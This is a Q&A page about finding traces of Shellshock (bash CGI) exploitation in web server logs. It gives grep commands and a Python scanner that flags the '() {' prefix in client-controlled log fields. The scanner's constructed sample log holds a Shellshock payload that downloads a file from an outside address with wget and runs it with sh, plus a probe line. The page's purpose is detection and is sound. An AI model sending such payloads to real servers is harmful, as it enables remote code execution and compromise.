I've patched my servers, but I'd also like to review my logs to see if there have been any compromises on them. Are there any consistent traces of exploits using this bug?
Viewed 618 times
Perhaps, but there is no common signature, because it is an arbitrary code execution bug. The attacker can pack whatever malicious payload they like into the environment variables they are poisoning. Better question: do you run any CGI-bin scripts? Otherwise you mostly need to authenticate via SSH in order to exploit it, so check your logs for unexpected SSH logins. – Frank Thomas Sep 25 '14 at 20:36
1 Answer
I caught some hits in the logs with:

```bash
# Recursively search the web-server logs for a quote immediately followed by "()",
# which is how the poisoned header values show up in the request/referer/user-agent fields.
grep -r '"()' /var/log/httpd/
grep -r "'()" /var/log/httpd/
```
Darren
Note that the paths used might differ based on your actual server, e.g. *lighttpd* would use `/var/log/lighttpd/` instead. – Mario Sep 27 '14 at 07:37
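The grep above is a quick first pass; when you actually have to triage hits you also want to know which field carried the payload, what command the attacker tried to run, and which source addresses to pivot on. The scanner below is an added example written for this page, not code from the question, the answer, or any project. It assumes Apache's "combined" log format (client, ident, user, time, request, status, bytes, referer, user-agent) and looks in the client-controlled fields for the `() {` function-definition prefix that a poisoned environment variable has to begin with, which is a tighter match than the answer's quote-followed-by-`()` grep. All log lines and addresses are constructed sample data.

```python
import re
import sys
from typing import Dict, List

# Apache "combined" log format: client ident user [time] "request" status bytes "referer" "user-agent".
# Assumption: this is the format your access log uses; other LogFormats fall through to a raw check.
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Function-definition prefix a poisoned variable must start with. Whitespace is allowed to
# vary so attempts that play with the spacing are flagged too (a deliberately broad net).
FUNC_PREFIX_RE = re.compile(r"\(\)\s*\{")

# Fields in the combined format that a remote client fully controls.
CLIENT_FIELDS = ("request", "referer", "agent")

# Constructed sample lines (not real traffic). Line 1 carries the payload in the User-Agent,
# line 3 in the Referer; lines 2 and 4 are benign and must not be flagged.
SAMPLE_LOG = r"""
192.0.2.10 - - [25/Sep/2014:20:36:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.5/x -O /tmp/x; sh /tmp/x'"
192.0.2.11 - - [25/Sep/2014:20:36:07 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.12 - - [25/Sep/2014:20:37:14 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 200 "() { ignored;}; echo vulnerable" "curl/7.37.0"
192.0.2.13 - - [25/Sep/2014:20:38:00 +0000] "GET /search?q=foo() HTTP/1.1" 200 80 "-" "Mozilla/5.0"
"""


def extract_command(value: str) -> str:
    """Everything after the function body, i.e. what the shell would run after importing
    the poisoned variable. Empty when the field has no '};' part."""
    idx = value.find("};")
    return value[idx + 2:].strip() if idx != -1 else ""


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one record per log line whose client-controlled fields carry the prefix."""
    hits: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = COMBINED_RE.match(line)
        if m is None:
            # Unknown format (e.g. a custom LogFormat): fall back to a whole-line check.
            if FUNC_PREFIX_RE.search(line):
                hits.append({"client": "?", "time": "?", "field": "raw",
                             "command": extract_command(line), "line": line})
            continue
        fields = m.groupdict()
        for name in CLIENT_FIELDS:
            if FUNC_PREFIX_RE.search(fields[name]):
                hits.append({"client": fields["client"], "time": fields["time"],
                             "field": name, "command": extract_command(fields[name]),
                             "line": line})
                break  # one record per line is enough
    return hits


def attacker_sources(hits: List[Dict[str, str]]) -> List[str]:
    """Distinct client addresses in first-seen order, for pivoting to SSH/auth logs."""
    seen: List[str] = []
    for h in hits:
        if h["client"] not in seen:
            seen.append(h["client"])
    return seen


if __name__ == "__main__":
    # Usage: python scan.py /var/log/httpd/access_log   (defaults to the constructed sample)
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LOG
    for h in scan_log(text):
        print(f'{h["time"]} {h["client"]} via {h["field"]}: {h["command"] or "(no command part)"}')
    print("sources:", ", ".join(attacker_sources(scan_log(text))))
```

One caveat to keep in mind when reading the results: the combined format only records the request line, Referer and User-Agent, but a CGI handler exports every request header as an environment variable, so a payload sent in a header your server does not log (Cookie, or any custom header) will not appear here at all. An empty result from this scanner or from the grep therefore shows that nothing was logged, not that nothing was attempted.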